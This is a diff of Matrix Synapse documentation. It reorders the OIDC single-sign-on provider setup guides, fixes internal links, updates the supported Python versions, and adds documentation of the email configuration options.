2. Set the callback URL to `[synapse public baseurl]/_synapse/client/oidc/callback`.
Run with `dex serve examples/config-dev.yaml`.
Synapse config:
```yaml
oidc_providers:
- idp_id: github
idp_name: Github
idp_brand: "github" # optional: styling hint for clients
discover: false
issuer: "https://github.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
authorization_endpoint: "https://github.com/login/oauth/authorize"
token_endpoint: "https://github.com/login/oauth/access_token"
userinfo_endpoint: "https://api.github.com/user"
scopes: ["read:user"]
user_mapping_provider:
config:
subject_claim: "id"
localpart_template: "{{ user.login }}"
display_name_template: "{{ user.name }}"
```
### Google
[Google][google-idp] is an OpenID certified authentication and authorisation provider.
1. Set up a project in the Google API Console (see
[documentation](https://developers.google.com/identity/protocols/oauth2/openid-connect#appsetup)).
3. Add an "OAuth Client ID" for a Web Application under "Credentials".
4. Copy the Client ID and Client Secret, and add the following to your synapse config:
```yaml
oidc_providers:
- idp_id: google
idp_name: Google
idp_brand: "google" # optional: styling hint for clients
issuer: "https://accounts.google.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
scopes: ["openid", "profile", "email"] # email is optional, read below
user_mapping_provider:
config:
localpart_template: "{{ user.given_name|lower }}"
display_name_template: "{{ user.name }}"
email_template: "{{ user.email }}" # needs "email" in scopes above
```
4. Back in the Google console, add this Authorized redirect URI: `[synapse
public baseurl]/_synapse/client/oidc/callback`.
### Twitch
1. Setup a developer account on [Twitch](https://dev.twitch.tv/)
2. Obtain the OAuth 2.0 credentials by [creating an app](https://dev.twitch.tv/console/apps/)
3. Add this OAuth Redirect URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: twitch
idp_name: Twitch
issuer: "https://id.twitch.tv/oauth2/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: "client_secret_post"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
```
### GitLab
1. Create a [new application](https://gitlab.com/profile/applications).
2. Add the `read_user` and `openid` scopes.
3. Add this Callback URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: gitlab
idp_name: Gitlab
idp_brand: "gitlab" # optional: styling hint for clients
issuer: "https://gitlab.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: "client_secret_post"
scopes: ["openid", "read_user"]
user_profile_method: "userinfo_endpoint"
user_mapping_provider:
config:
localpart_template: '{{ user.nickname }}'
display_name_template: '{{ user.name }}'
```
### Facebook
0. You will need a Facebook developer account. You can register for one
[here](https://developers.facebook.com/async/registration/).
1. On the [apps](https://developers.facebook.com/apps/) page of the developer
console, "Create App", and choose "Build Connected Experiences".
2. Once the app is created, add "Facebook Login" and choose "Web". You don't
need to go through the whole form here.
3. In the left-hand menu, open "Products"/"Facebook Login"/"Settings".
* Add `[synapse public baseurl]/_synapse/client/oidc/callback` as an OAuth Redirect
URL.
4. In the left-hand menu, open "Settings/Basic". Here you can copy the "App ID"
and "App Secret" for use below.
Synapse config:
```yaml
- idp_id: facebook
idp_name: Facebook
idp_brand: "facebook" # optional: styling hint for clients
discover: false
issuer: "https://www.facebook.com"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
scopes: ["openid", "email"]
authorization_endpoint: "https://facebook.com/dialog/oauth"
token_endpoint: "https://graph.facebook.com/v9.0/oauth/access_token"
jwks_uri: "https://www.facebook.com/.well-known/oauth/openid/jwks/"
user_mapping_provider:
config:
display_name_template: "{{ user.name }}"
email_template: "{{ user.email }}"
```
Relevant documents:
* [Manually Build a Login Flow](https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow)
* [Using Facebook's Graph API](https://developers.facebook.com/docs/graph-api/using-graph-api/)
* [Reference to the User endpoint](https://developers.facebook.com/docs/graph-api/reference/user)
Facebook do have an [OIDC discovery endpoint](https://www.facebook.com/.well-known/openid-configuration),
but it has a `response_types_supported` which excludes "code" (which we rely on, and
is even mentioned in their [documentation](https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow#login)),
so we have to disable discovery and configure the URIs manually.
### Gitea
Gitea is, like Github, not an OpenID provider, but just an OAuth2 provider.
The [`/user` API endpoint](https://try.gitea.io/api/swagger#/user/userGetCurrent)
can be used to retrieve information on the authenticated user. As the Synapse
login mechanism needs an attribute to uniquely identify users, and that endpoint
does not return a `sub` property, an alternative `subject_claim` has to be set.
1. Create a new application.
2. Add this Callback URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: gitea
idp_name: Gitea
discover: false
issuer: "https://your-gitea.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: client_secret_post
scopes: [] # Gitea doesn't support Scopes
authorization_endpoint: "https://your-gitea.com/login/oauth/authorize"
token_endpoint: "https://your-gitea.com/login/oauth/access_token"
userinfo_endpoint: "https://your-gitea.com/api/v1/user"
user_mapping_provider:
config:
subject_claim: "id"
localpart_template: "{{ user.login }}"
display_name_template: "{{ user.full_name }}"
```
### XWiki
Install [OpenID Connect Provider](https://extensions.xwiki.org/xwiki/bin/view/Extension/OpenID%20Connect/OpenID%20Connect%20Provider/) extension in your [XWiki](https://www.xwiki.org) instance.
Synapse config:
```yaml
oidc_providers:
- idp_id: xwiki
idp_name: "XWiki"
issuer: "https://myxwikihost/xwiki/oidc/"
client_id: "your-client-id" # TO BE FILLED
client_auth_method: none
- idp_id: dex
idp_name: "My Dex server"
skip_verification: true # This is needed as Dex is served on an insecure endpoint
issuer: "http://127.0.0.1:5556/dex"
client_id: "synapse"
client_secret: "secret"
scopes: ["openid", "profile"]
user_profile_method: "userinfo_endpoint"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
```
### Apple
Configuring "Sign in with Apple" (SiWA) requires an Apple Developer account.
You will need to create a new "Services ID" for SiWA, and create and download a
private key with "SiWA" enabled.
As well as the private key file, you will need:
* Client ID: the "identifier" you gave the "Services ID"
* Team ID: a 10-character ID associated with your developer account.
* Key ID: the 10-character identifier for the key.
[Apple's developer documentation](https://help.apple.com/developer-account/?lang=en#/dev77c875b7e)
has more information on setting up SiWA.
The synapse config will look like this:
```yaml
- idp_id: apple
idp_name: Apple
issuer: "https://appleid.apple.com"
client_id: "your-client-id" # Set to the "identifier" for your "ServicesID"
client_auth_method: "client_secret_post"
client_secret_jwt_key:
key_file: "/path/to/AuthKey_KEYIDCODE.p8" # point to your key file
jwt_header:
alg: ES256
kid: "KEYIDCODE" # Set to the 10-char Key ID
jwt_payload:
iss: TEAMIDCODE # Set to the 10-char Team ID
scopes: ["name", "email", "openid"]
authorization_endpoint: https://appleid.apple.com/auth/authorize?response_mode=form_post
user_mapping_provider:
config:
email_template: "{{ user.email }}"
localpart_template: "{{ user.name }}"
display_name_template: "{{ user.name|capitalize }}"
```
### Django OAuth Toolkit
@ -591,6 +292,263 @@ oidc_providers:
email_template: "{{ user.email }}"
```
### Facebook
0. You will need a Facebook developer account. You can register for one
[here](https://developers.facebook.com/async/registration/).
1. On the [apps](https://developers.facebook.com/apps/) page of the developer
console, "Create App", and choose "Build Connected Experiences".
2. Once the app is created, add "Facebook Login" and choose "Web". You don't
need to go through the whole form here.
3. In the left-hand menu, open "Products"/"Facebook Login"/"Settings".
* Add `[synapse public baseurl]/_synapse/client/oidc/callback` as an OAuth Redirect
URL.
4. In the left-hand menu, open "Settings/Basic". Here you can copy the "App ID"
and "App Secret" for use below.
Synapse config:
```yaml
- idp_id: facebook
idp_name: Facebook
idp_brand: "facebook" # optional: styling hint for clients
discover: false
issuer: "https://www.facebook.com"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
scopes: ["openid", "email"]
authorization_endpoint: "https://facebook.com/dialog/oauth"
token_endpoint: "https://graph.facebook.com/v9.0/oauth/access_token"
jwks_uri: "https://www.facebook.com/.well-known/oauth/openid/jwks/"
user_mapping_provider:
config:
display_name_template: "{{ user.name }}"
email_template: "{{ user.email }}"
```
Relevant documents:
* [Manually Build a Login Flow](https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow)
* [Using Facebook's Graph API](https://developers.facebook.com/docs/graph-api/using-graph-api/)
* [Reference to the User endpoint](https://developers.facebook.com/docs/graph-api/reference/user)
Facebook do have an [OIDC discovery endpoint](https://www.facebook.com/.well-known/openid-configuration),
but it has a `response_types_supported` which excludes "code" (which we rely on, and
is even mentioned in their [documentation](https://developers.facebook.com/docs/facebook-login/manually-build-a-login-flow#login)),
so we have to disable discovery and configure the URIs manually.
### GitHub
[GitHub][github-idp] is a bit special as it is not an OpenID Connect compliant provider, but
just a regular OAuth2 provider.
The [`/user` API endpoint](https://developer.github.com/v3/users/#get-the-authenticated-user)
can be used to retrieve information on the authenticated user. As the Synapse
login mechanism needs an attribute to uniquely identify users, and that endpoint
does not return a `sub` property, an alternative `subject_claim` has to be set.
1. Create a new OAuth application: [https://github.com/settings/applications/new](https://github.com/settings/applications/new).
2. Set the callback URL to `[synapse public baseurl]/_synapse/client/oidc/callback`.
Synapse config:
```yaml
oidc_providers:
- idp_id: github
idp_name: Github
idp_brand: "github" # optional: styling hint for clients
discover: false
issuer: "https://github.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
authorization_endpoint: "https://github.com/login/oauth/authorize"
token_endpoint: "https://github.com/login/oauth/access_token"
userinfo_endpoint: "https://api.github.com/user"
scopes: ["read:user"]
user_mapping_provider:
config:
subject_claim: "id"
localpart_template: "{{ user.login }}"
display_name_template: "{{ user.name }}"
```
### GitLab
1. Create a [new application](https://gitlab.com/profile/applications).
2. Add the `read_user` and `openid` scopes.
3. Add this Callback URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: gitlab
idp_name: Gitlab
idp_brand: "gitlab" # optional: styling hint for clients
issuer: "https://gitlab.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: "client_secret_post"
scopes: ["openid", "read_user"]
user_profile_method: "userinfo_endpoint"
user_mapping_provider:
config:
localpart_template: '{{ user.nickname }}'
display_name_template: '{{ user.name }}'
```
### Gitea
Gitea is, like Github, not an OpenID provider, but just an OAuth2 provider.
The [`/user` API endpoint](https://try.gitea.io/api/swagger#/user/userGetCurrent)
can be used to retrieve information on the authenticated user. As the Synapse
login mechanism needs an attribute to uniquely identify users, and that endpoint
does not return a `sub` property, an alternative `subject_claim` has to be set.
1. Create a new application.
2. Add this Callback URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: gitea
idp_name: Gitea
discover: false
issuer: "https://your-gitea.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: client_secret_post
scopes: [] # Gitea doesn't support Scopes
authorization_endpoint: "https://your-gitea.com/login/oauth/authorize"
token_endpoint: "https://your-gitea.com/login/oauth/access_token"
userinfo_endpoint: "https://your-gitea.com/api/v1/user"
user_mapping_provider:
config:
subject_claim: "id"
localpart_template: "{{ user.login }}"
display_name_template: "{{ user.full_name }}"
```
### Google
[Google][google-idp] is an OpenID certified authentication and authorisation provider.
1. Set up a project in the Google API Console (see
[documentation](https://developers.google.com/identity/protocols/oauth2/openid-connect#appsetup)).
3. Add an "OAuth Client ID" for a Web Application under "Credentials".
4. Copy the Client ID and Client Secret, and add the following to your synapse config:
```yaml
oidc_providers:
- idp_id: google
idp_name: Google
idp_brand: "google" # optional: styling hint for clients
issuer: "https://accounts.google.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
scopes: ["openid", "profile", "email"] # email is optional, read below
user_mapping_provider:
config:
localpart_template: "{{ user.given_name|lower }}"
display_name_template: "{{ user.name }}"
email_template: "{{ user.email }}" # needs "email" in scopes above
```
4. Back in the Google console, add this Authorized redirect URI: `[synapse
public baseurl]/_synapse/client/oidc/callback`.
### Keycloak
[Keycloak][keycloak-idp] is an opensource IdP maintained by Red Hat.
Keycloak supports OIDC Back-Channel Logout, which sends logout notification to Synapse, so that Synapse users get logged out when they log out from Keycloak.
This can be optionally enabled by setting `backchannel_logout_enabled` to `true` in the Synapse configuration, and by setting the "Backchannel Logout URL" in Keycloak.
Follow the [Getting Started Guide](https://www.keycloak.org/guides) to install Keycloak and set up a realm.
1. Click `Clients` in the sidebar and click `Create`
2. Fill in the fields as below:
| Field | Value |
|-----------|-----------|
| Client ID | `synapse` |
| Client Protocol | `openid-connect` |
3. Click `Save`
4. Fill in the fields as below:
| Field | Value |
|-----------|-----------|
| Client ID | `synapse` |
| Enabled | `On` |
| Client Protocol | `openid-connect` |
| Access Type | `confidential` |
| Valid Redirect URIs | `[synapse public baseurl]/_synapse/client/oidc/callback` |
| Backchannel Logout URL (optional) | `[synapse public baseurl]/_synapse/client/oidc/backchannel_logout` |
| Backchannel Logout Session Required (optional) | `On` |
5. Click `Save`
6. On the Credentials tab, update the fields:
| Field | Value |
|-------|-------|
| Client Authenticator | `Client ID and Secret` |
7. Click `Regenerate Secret`
8. Copy Secret
```yaml
oidc_providers:
- idp_id: keycloak
idp_name: "My KeyCloak server"
issuer: "https://127.0.0.1:8443/realms/{realm_name}"
client_id: "synapse"
client_secret: "copy secret generated from above"
scopes: ["openid", "profile"]
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
backchannel_logout_enabled: true # Optional
```
### LemonLDAP
[LemonLDAP::NG][lemonldap] is an open-source IdP solution.
1. Create an OpenID Connect Relying Parties in LemonLDAP::NG
2. The parameters are:
- Client ID under the basic menu of the new Relying Parties (`Options > Basic >
Client ID`)
- Client secret (`Options > Basic > Client secret`)
- JWT Algorithm: RS256 within the security menu of the new Relying Parties
(`Options > Security > ID Token signature algorithm` and `Options > Security >
Access Token signature algorithm`)
- Scopes: OpenID, Email and Profile
- Allowed redirection addresses for login (`Options > Basic > Allowed
redirection addresses for login` ) :
`[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: lemonldap
idp_name: lemonldap
discover: true
issuer: "https://auth.example.org/" # TO BE FILLED: replace with your domain
client_id: "your client id" # TO BE FILLED
client_secret: "your client secret" # TO BE FILLED
scopes:
- "openid"
- "profile"
- "email"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}}"
# TO BE FILLED: If your users have names in LemonLDAP::NG and you want those in Synapse, this should be replaced with user.name|capitalize or any valid filter.
display_name_template: "{{ user.preferred_username|capitalize }}"
```
### Mastodon
[Mastodon](https://docs.joinmastodon.org/) instances provide an [OAuth API](https://docs.joinmastodon.org/spec/oauth/), allowing those instances to be used as a single sign-on provider for Synapse.
@ -631,3 +589,81 @@ oidc_providers:
```
Note that the fields `client_id` and `client_secret` are taken from the CURL response above.
### Twitch
1. Setup a developer account on [Twitch](https://dev.twitch.tv/)
2. Obtain the OAuth 2.0 credentials by [creating an app](https://dev.twitch.tv/console/apps/)
3. Add this OAuth Redirect URL: `[synapse public baseurl]/_synapse/client/oidc/callback`
Synapse config:
```yaml
oidc_providers:
- idp_id: twitch
idp_name: Twitch
issuer: "https://id.twitch.tv/oauth2/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
client_auth_method: "client_secret_post"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
```
### Twitter
*Using Twitter as an identity provider requires using Synapse 1.75.0 or later.*
1. Setup a developer account on [Twitter](https://developer.twitter.com/en/portal/dashboard)
2. Create a project & app.
3. Enable user authentication and under "Type of App" choose "Web App, Automated App or Bot".
4. Under "App info" set the callback URL to `[synapse public baseurl]/_synapse/client/oidc/callback`.
5. Obtain the OAuth 2.0 credentials under the "Keys and tokens" tab, copy the "OAuth 2.0 Client ID and Client Secret"
Synapse config:
```yaml
oidc_providers:
- idp_id: twitter
idp_name: Twitter
idp_brand: "twitter" # optional: styling hint for clients
discover: false # Twitter is not OpenID compliant.
issuer: "https://twitter.com/"
client_id: "your-client-id" # TO BE FILLED
client_secret: "your-client-secret" # TO BE FILLED
pkce_method: "always"
# offline.access providers refresh tokens, tweet.read and users.read needed for userinfo request.
scopes: ["offline.access", "tweet.read", "users.read"]
authorization_endpoint: https://twitter.com/i/oauth2/authorize
token_endpoint: https://api.twitter.com/2/oauth2/token
userinfo_endpoint: https://api.twitter.com/2/users/me?user.fields=profile_image_url
user_mapping_provider:
config:
subject_template: "{{ user.data.id }}"
localpart_template: "{{ user.data.username }}"
display_name_template: "{{ user.data.name }}"
picture_template: "{{ user.data.profile_image_url }}"
```
### XWiki
Install [OpenID Connect Provider](https://extensions.xwiki.org/xwiki/bin/view/Extension/OpenID%20Connect/OpenID%20Connect%20Provider/) extension in your [XWiki](https://www.xwiki.org) instance.
Synapse config:
```yaml
oidc_providers:
- idp_id: xwiki
idp_name: "XWiki"
issuer: "https://myxwikihost/xwiki/oidc/"
client_id: "your-client-id" # TO BE FILLED
client_auth_method: none
scopes: ["openid", "profile"]
user_profile_method: "userinfo_endpoint"
user_mapping_provider:
config:
localpart_template: "{{ user.preferred_username }}"
display_name_template: "{{ user.name }}"
```

View File

@ -16,7 +16,7 @@ connect to a postgres database.
- For other pre-built packages, please consult the documentation from
the relevant package.
- If you installed synapse [in a
virtualenv](setup/installation.md#installing-from-source), you can install
virtualenv](setup/installation.md#installing-as-a-python-module-from-pypi), you can install
the library with:
~/synapse/env/bin/pip install "matrix-synapse[postgres]"

View File

@ -46,7 +46,7 @@ when using a containerized Synapse, as that will prevent it from responding
to proxied traffic.)
Optionally, you can also set
[`request_id_header`](../usage/configuration/config_documentation.md#listeners)
[`request_id_header`](./usage/configuration/config_documentation.md#listeners)
so that the server extracts and re-uses the same request ID format that the
reverse proxy is using.

View File

@ -136,7 +136,7 @@ Unofficial package are built for SLES 15 in the openSUSE:Backports:SLE-15 reposi
#### ArchLinux
The quickest way to get up and running with ArchLinux is probably with the community package
<https://www.archlinux.org/packages/community/any/matrix-synapse/>, which should pull in most of
<https://archlinux.org/packages/community/x86_64/matrix-synapse/>, which should pull in most of
the necessary dependencies.
pip may be outdated (6.0.7-1 and needs to be upgraded to 6.0.8-1 ):
@ -200,7 +200,7 @@ When following this route please make sure that the [Platform-specific prerequis
System requirements:
- POSIX-compliant system (tested on Linux & OS X)
- Python 3.7 or later, up to Python 3.10.
- Python 3.7 or later, up to Python 3.11.
- At least 1GB of free RAM if you want to join large public rooms like #matrix:matrix.org
If building on an uncommon architecture for which pre-built wheels are

View File

@ -120,7 +120,7 @@ specified in the config. It is located at
## SAML Mapping Providers
The SAML mapping provider can be customized by editing the
[`saml2_config.user_mapping_provider.module`](docs/usage/configuration/config_documentation.md#saml2_config)
[`saml2_config.user_mapping_provider.module`](usage/configuration/config_documentation.md#saml2_config)
config option.
`saml2_config.user_mapping_provider.config` allows you to provide custom

View File

@ -99,7 +99,7 @@ the ICU native dependency and its development headers
so that PyICU can build since no prebuilt wheels are available.
You can follow [the PyICU documentation](https://pypi.org/project/PyICU/) to do so,
and then do `pip install matrix-synapse[icu]` for a PyPI install.
and then do `pip install matrix-synapse[user-search]` for a PyPI install.
Docker images and Debian packages need nothing specific as they already
include or specify ICU as an explicit dependency.
@ -889,8 +889,8 @@ Any scripts still using the above APIs should be converted to use the
## User-interactive authentication fallback templates can now display errors
This may affect you if you make use of custom HTML templates for the
[reCAPTCHA](../synapse/res/templates/recaptcha.html) or
[terms](../synapse/res/templates/terms.html) fallback pages.
[reCAPTCHA (`synapse/res/templates/recaptcha.html`)](https://github.com/matrix-org/synapse/tree/develop/synapse/res/templates/recaptcha.html) or
[terms (`synapse/res/templates/terms.html`)](https://github.com/matrix-org/synapse/tree/develop/synapse/res/templates/terms.html) fallback pages.
The template is now provided an `error` variable if the authentication
process failed. See the default templates linked above for an example.
@ -1488,7 +1488,7 @@ New templates (`sso_auth_confirm.html`, `sso_auth_success.html`, and
is configured to use SSO and a custom
`sso_redirect_confirm_template_dir` configuration then these templates
will need to be copied from
[synapse/res/templates](synapse/res/templates) into that directory.
[`synapse/res/templates`](https://github.com/matrix-org/synapse/tree/develop/synapse/res/templates) into that directory.
## Synapse SSO Plugins Method Deprecation

View File

@ -7,7 +7,7 @@ server admin. (Note that a server admin is distinct from a room admin.)
An existing user can be marked as a server admin by updating the database directly.
Check your [database settings](config_documentation.md#database) in the configuration file, connect to the correct database using either `psql [database name]` (if using PostgreSQL) or `sqlite3 path/to/your/database.db` (if using SQLite) and elevate the user `@foo:bar.com` to administrator.
Check your [database settings](../../configuration/config_documentation.md#database) in the configuration file, connect to the correct database using either `psql [database name]` (if using PostgreSQL) or `sqlite3 path/to/your/database.db` (if using SQLite) and elevate the user `@foo:bar.com` to administrator.
```sql
UPDATE users SET admin = 1 WHERE name = '@foo:bar.com';
```
@ -32,10 +32,10 @@ curl --header "Authorization: Bearer <access_token>" <the_rest_of_your_API_reque
```
For example, suppose we want to
[query the account](user_admin_api.md#query-user-account) of the user
[query the account](../../../admin_api/user_admin_api.md#query-user-account) of the user
`@foo:bar.com`. We need an admin access token (e.g.
`syt_AjfVef2_L33JNpafeif_0feKJfeaf0CQpoZk`), and we need to know which port
Synapse's [`client` listener](config_documentation.md#listeners) is listening
Synapse's [`client` listener](../../configuration/config_documentation.md#listeners) is listening
on (e.g. `8008`). Then we can use the following command to request the account
information from the Admin API.

View File

@ -81,7 +81,7 @@ The following fields are returned in the JSON response body:
- `failure_ts` - nullable integer - The first time Synapse tried and failed to reach the
remote server, in ms. This is `null` if communication with the remote server has never failed.
- `last_successful_stream_ordering` - nullable integer - The stream ordering of the most
recent successfully-sent [PDU](understanding_synapse_through_grafana_graphs.md#federation)
recent successfully-sent [PDU](../understanding_synapse_through_grafana_graphs.md#federation)
to this destination, or `null` if this information has not been tracked yet.
- `next_token`: string representing a positive integer - Indication for pagination. See above.
- `total` - integer - Total number of destinations.
@ -174,7 +174,7 @@ The following fields are returned in the JSON response body:
Room objects contain the following fields:
- `room_id` - string - The ID of the room.
- `stream_ordering` - integer - The stream ordering of the most recent
successfully-sent [PDU](understanding_synapse_through_grafana_graphs.md#federation)
successfully-sent [PDU](../understanding_synapse_through_grafana_graphs.md#federation)
to this destination in this room.
- `next_token`: string representing a positive integer - Indication for pagination. See above.
- `total` - integer - Total number of destinations.

View File

@ -6,7 +6,7 @@ registration requests, as proposed in
and stabilised in version 1.2 of the Matrix specification.
To use it, you will need to enable the `registration_requires_token` config
option, and authenticate by providing an `access_token` for a server admin:
see [Admin API](../admin_api).
see [Admin API](../admin_api/).
## Registration token objects

View File

@ -2,7 +2,7 @@
How do I become a server admin?
---
If your server already has an admin account you should use the [User Admin API](../../admin_api/user_admin_api.md#Change-whether-a-user-is-a-server-administrator-or-not) to promote other accounts to become admins.
If your server already has an admin account you should use the [User Admin API](../../admin_api/user_admin_api.md#change-whether-a-user-is-a-server-administrator-or-not) to promote other accounts to become admins.
If you don't have any admin accounts yet you won't be able to use the admin API, so you'll have to edit the database manually. Manually editing the database is generally not recommended so once you have an admin account: use the admin APIs to make further changes.
@ -115,7 +115,7 @@ something like the following in their logs:
2019-09-11 19:32:04,271 - synapse.federation.transport.server - 288 - WARNING - GET-11752 - authenticate_request failed: 401: Invalid signature for server <server> with key ed25519:a_EqML: Unable to verify signature for <server>
This is normally caused by a misconfiguration in your reverse-proxy. See [the reverse proxy docs](docs/reverse_proxy.md) and double-check that your settings are correct.
This is normally caused by a misconfiguration in your reverse-proxy. See [the reverse proxy docs](../../reverse_proxy.md) and double-check that your settings are correct.
Help!! Synapse is slow and eats all my RAM/CPU!

View File

@ -78,4 +78,4 @@ If you would like to set up your own statistics collection server and send metri
consider using one of the following known implementations:
* [Matrix.org's Panopticon](https://github.com/matrix-org/panopticon)
* [Famedly's Barad-dûr](https://gitlab.com/famedly/company/devops/services/barad-dur)
* [Famedly's Barad-dûr](https://gitlab.com/famedly/infra/services/barad-dur)

View File

@ -1,6 +1,6 @@
# Request log format
HTTP request logs are written by synapse (see [`site.py`](../synapse/http/site.py) for details).
HTTP request logs are written by synapse (see [`synapse/http/site.py`](https://github.com/matrix-org/synapse/tree/develop/synapse/http/site.py) for details).
See the following for how to decode the dense data available from the default logging configuration.

View File

@ -569,6 +569,115 @@ Example configuration:
```yaml
delete_stale_devices_after: 1y
```
---
### `email`
Configuration for sending emails from Synapse.
Server admins can configure custom templates for email content. See
[here](../../templates.md) for more information.
This setting has the following sub-options:
* `smtp_host`: The hostname of the outgoing SMTP server to use. Defaults to 'localhost'.
* `smtp_port`: The port on the mail server for outgoing SMTP. Defaults to 465 if `force_tls` is true, else 25.
_Changed in Synapse 1.64.0:_ the default port is now aware of `force_tls`.
* `smtp_user` and `smtp_pass`: Username/password for authentication to the SMTP server. By default, no
authentication is attempted.
* `force_tls`: By default, Synapse connects over plain text and then optionally upgrades
to TLS via STARTTLS. If this option is set to true, TLS is used from the start (Implicit TLS),
and the option `require_transport_security` is ignored.
It is recommended to enable this if supported by your mail server.
_New in Synapse 1.64.0._
* `require_transport_security`: Set to true to require TLS transport security for SMTP.
By default, Synapse will connect over plain text, and will then switch to
TLS via STARTTLS *if the SMTP server supports it*. If this option is set,
Synapse will refuse to connect unless the server supports STARTTLS.
* `enable_tls`: By default, if the server supports TLS, it will be used, and the server
must present a certificate that is valid for 'smtp_host'. If this option
is set to false, TLS will not be used.
* `notif_from`: defines the "From" address to use when sending emails.
It must be set if email sending is enabled. The placeholder '%(app)s' will be replaced by the application name,
which is normally set in `app_name`, but may be overridden by the
Matrix client application. Note that the placeholder must be written '%(app)s', including the
trailing 's'.
* `app_name`: `app_name` defines the default value for '%(app)s' in `notif_from` and email
subjects. It defaults to 'Matrix'.
* `enable_notifs`: Set to true to enable sending emails for messages that the user
has missed. Disabled by default.
* `notif_for_new_users`: Set to false to disable automatic subscription to email
notifications for new users. Enabled by default.
* `client_base_url`: Custom URL for client links within the email notifications. By default
links will be based on "https://matrix.to". (This setting used to be called `riot_base_url`;
the old name is still supported for backwards-compatibility but is now deprecated.)
* `validation_token_lifetime`: Configures the time that a validation email will expire after sending.
Defaults to 1h.
* `invite_client_location`: The web client location to direct users to during an invite. This is passed
to the identity server as the `org.matrix.web_client_location` key. Defaults
to unset, giving no guidance to the identity server.
* `subjects`: Subjects to use when sending emails from Synapse. The placeholder '%(app)s' will
be replaced with the value of the `app_name` setting, or by a value dictated by the Matrix client application.
In addition, each subject can use the following placeholders: '%(person)s', which will be replaced by the displayname
of the user(s) that sent the message(s), e.g. "Alice and Bob", and '%(room)s', which will be replaced by the name of the room the
message(s) have been sent to, e.g. "My super room". In addition, emails related to account administration will
can use the '%(server_name)s' placeholder, which will be replaced by the value of the
`server_name` setting in your Synapse configuration.
Here is a list of subjects for notification emails that can be set:
* `message_from_person_in_room`: Subject to use to notify about one message from one or more user(s) in a
room which has a name. Defaults to "[%(app)s] You have a message on %(app)s from %(person)s in the %(room)s room..."
* `message_from_person`: Subject to use to notify about one message from one or more user(s) in a
room which doesn't have a name. Defaults to "[%(app)s] You have a message on %(app)s from %(person)s..."
* `messages_from_person`: Subject to use to notify about multiple messages from one or more users in
a room which doesn't have a name. Defaults to "[%(app)s] You have messages on %(app)s from %(person)s..."
* `messages_in_room`: Subject to use to notify about multiple messages in a room which has a
name. Defaults to "[%(app)s] You have messages on %(app)s in the %(room)s room..."
* `messages_in_room_and_others`: Subject to use to notify about multiple messages in multiple rooms.
Defaults to "[%(app)s] You have messages on %(app)s in the %(room)s room and others..."
* `messages_from_person_and_others`: Subject to use to notify about multiple messages from multiple persons in
multiple rooms. This is similar to the setting above except it's used when
the room in which the notification was triggered has no name. Defaults to
"[%(app)s] You have messages on %(app)s from %(person)s and others..."
* `invite_from_person_to_room`: Subject to use to notify about an invite to a room which has a name.
Defaults to "[%(app)s] %(person)s has invited you to join the %(room)s room on %(app)s..."
* `invite_from_person`: Subject to use to notify about an invite to a room which doesn't have a
name. Defaults to "[%(app)s] %(person)s has invited you to chat on %(app)s..."
* `password_reset`: Subject to use when sending a password reset email. Defaults to "[%(server_name)s] Password reset"
* `email_validation`: Subject to use when sending a verification email to assert an address's
ownership. Defaults to "[%(server_name)s] Validate your email"
Example configuration:
```yaml
email:
smtp_host: mail.server
smtp_port: 587
smtp_user: "exampleusername"
smtp_pass: "examplepassword"
force_tls: true
require_transport_security: true
enable_tls: false
notif_from: "Your Friendly %(app)s homeserver <noreply@example.com>"
app_name: my_branded_matrix_server
enable_notifs: true
notif_for_new_users: false
client_base_url: "http://localhost/riot"
validation_token_lifetime: 15m
invite_client_location: https://app.element.io
subjects:
message_from_person_in_room: "[%(app)s] You have a message on %(app)s from %(person)s in the %(room)s room..."
message_from_person: "[%(app)s] You have a message on %(app)s from %(person)s..."
messages_from_person: "[%(app)s] You have messages on %(app)s from %(person)s..."
messages_in_room: "[%(app)s] You have messages on %(app)s in the %(room)s room..."
messages_in_room_and_others: "[%(app)s] You have messages on %(app)s in the %(room)s room and others..."
messages_from_person_and_others: "[%(app)s] You have messages on %(app)s from %(person)s and others..."
invite_from_person_to_room: "[%(app)s] %(person)s has invited you to join the %(room)s room on %(app)s..."
invite_from_person: "[%(app)s] %(person)s has invited you to chat on %(app)s..."
password_reset: "[%(server_name)s] Password reset"
email_validation: "[%(server_name)s] Validate your email"
```
## Homeserver blocking
